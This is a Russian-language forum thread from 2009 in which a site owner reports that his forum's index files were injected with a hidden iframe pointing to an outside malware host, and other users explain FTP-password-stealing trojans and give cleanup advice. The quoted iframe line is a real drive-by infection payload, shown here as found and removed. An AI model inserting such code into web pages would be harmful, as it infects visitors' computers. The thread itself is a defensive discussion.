ExBB Community ExBB Community
 Сайт проекта ExBB Общение объединяет!
Войдите на форум при помощиВойти через loginza
 Чат на форуме      Помощь      Поиск      Пользователи     BanList BanList


 Страниц (1): [1]   

> Без описания
i-text
Отправлено: 21 августа 2009 — 12:05
Post Id



Пользователь
Newbie


Покинул форум
Сообщений всего: 17
Дата рег-ции: Июль 2009  
Откуда: Москва
Репутация: 1




Сегодня утром захожу на свой форум... И вижу белое окно браузера.

В недоумении заглядываю на фтп и слышу голос аваста: "Внимание обнаружен вирус!". Смотрю на список файлов и действительно файл "index.php" недавно был модифицирован, открываю его в редакторе и вижу последняя часть его кода варварски удалена (с 281 по 296 строку), а за место нее стоит ненавистный iframe тег, такого типа:
CODE:

iframe src="http://f5l.at:8080/ts/in.cgi?pepsi154" width=125 height=125 style="visibility: hidden"></iframe>
. Удалил. А потом обнаружил, что это содержание внедрено практически во все "индекс" файлы форума. Пришлось чистить.

Кто может подсказать как бороться с такими атаками? Как их предотвратить? И как они вообще возможны? Как был получен доступ на запись к индекс файлам?

(Отредактировано автором: 21 августа 2009 — 12:06)

 
 
RomAndry
Отправлено: 21 августа 2009 — 12:20
Post Id


Пользователь
Newbie


Покинул форум
Сообщений всего: 33
Дата рег-ции: Июнь 2009  
Откуда: Ukraine
Репутация: 6




1. не читать подозрительные письма!
2. не ходить по подозрительным ссылкам!
3. почистить комп от вирусов
4. почистить измененные файлы (смотреть по дате модификации)
5. сменить пароли на ФТП и Базу
6. стараться не использовать total Comander
7. повторять пункт 1 и 2 до просветвления Язычок
 
 
i-text
Отправлено: 21 августа 2009 — 13:30
Post Id



Пользователь
Newbie


Покинул форум
Сообщений всего: 17
Дата рег-ции: Июль 2009  
Откуда: Москва
Репутация: 1




RomAndry Спасибо. Радость
Но я это все проделал.
Мне стал интересен механизм доступа к файлам на фтп. Какими путями это делается?
Т.е. как я понял, после проникновения на компьютер, вирус ворует пароли из фтп клиента (у меня файлзилла) и ... что происходит дальше? Он куда-то отсылает полученные данные?
 
 
Borman
Отправлено: 21 августа 2009 — 14:23
Post Id


Пользователь
Full Member


Покинул форум
Сообщений всего: 182
Дата рег-ции: Февр. 2009  
Откуда: Украина, Донецк
Репутация: 3




RomAndry +1 И желательно иметь файрвол типа OutPost и хорошенько его настроить, или антивирь типа Esset Smart Security с файрволом.

И ребята мой вам совет не шартесь по порно сайтам, это рассадник вирусов и троянов, убедился на собственном опыте. После их посещения Каспер не успевал ДОС-атаки отбивать.
 
 
Victor
Отправлено: 21 августа 2009 — 19:15
Post Id


Пользователь
Full Member


Покинул форум
Сообщений всего: 237
Дата рег-ции: Март 2009  
Репутация: 14




RomAndry +1
вирус атаковал фтп через ТоталКомандер (он имеет такую уязвимость)..одно хорошо заразив файлы он больше не возвращается на тот же ресурс...
чистить комп от вирусов и обновлять базу антивира.. в общем то тотал после этого меня не подводил.. крайний вариант тех.поддержка хостинга тоже может помочь...
 
 
RomAndry
Отправлено: 21 августа 2009 — 19:57
Post Id


Пользователь
Newbie


Покинул форум
Сообщений всего: 33
Дата рег-ции: Июнь 2009  
Откуда: Ukraine
Репутация: 6




i-text пишет:
Т.е. как я понял, после проникновения на компьютер, вирус ворует пароли из фтп клиента (у меня файлзилла) и ... что происходит дальше? Он куда-то отсылает полученные данные?

да, различные модификации есть этого вида трояна, в кратце скажу так
заходят на аккаунты, которые были на ФТП, модифицируют файлы, далее посетители заходят на страничку с вирусом и заражаются и точно так же далее происходит по принципу цепной реакции. Есть модификации, которые потом используют зараженные компьютеры для DDOS атак
 
 
Страниц (1): [1]
Сейчас эту тему просматривают: 1 (гостей: 1, зарегистрированных: 0)
« Уязвимости »

> Похожие темы: Форум атакован вирусом типа HTML:Iframe-inf
Темы Форум Информация о теме Обновление
Какие файлы и папки сохранить для переноса?
Форум заспамили... Надеюсь на переустановку...
Установка и обновление Ответов: 31
Автор темы: DreaMinder
31 января 2010 — 14:01
Автор: DreaMinder
Запрет на копирование содержимого
Запрет на копирование HTML содержимого и фотографий
Обсуждаем Ответов: 31
Автор темы: msnavigator
24 апреля 2011 — 17:59
Автор: valet92
Проблема при просмотре форума Гуглом
public_html/forum/index.php on line 293
Решение проблем Ответов: 2
Автор темы: Sasa1
21 декабря 2010 — 15:14
Автор: Sasa1
Добавляется точка с запятой (;) в конце текста и лишний пробел
если НЕ включить HTML теги в тексте сообщения
Решение проблем Ответов: 5
Автор темы: shyuser
21 июля 2009 — 22:15
Автор: yura3d
Зависание перехода на форум
При переходе по ссылке Форум страница не загружается
Решение проблем Ответов: 18
Автор темы: Павел Пушков
13 января 2018 — 14:54
Автор: Павел Пушков
 



Все гости форума могут просматривать этот раздел.
Только администраторы и модераторы могут создавать новые темы в этом разделе.
Только администраторы и модераторы могут отвечать на сообщения в этом разделе.
 




Яндекс.Метрика   

Powered by ExBB
ExBB FM 1.0 RC1 by TvoyWeb.ru
InvisionExBB Style converted by Markus®

[Script Execution time: 0.0725]     [ ]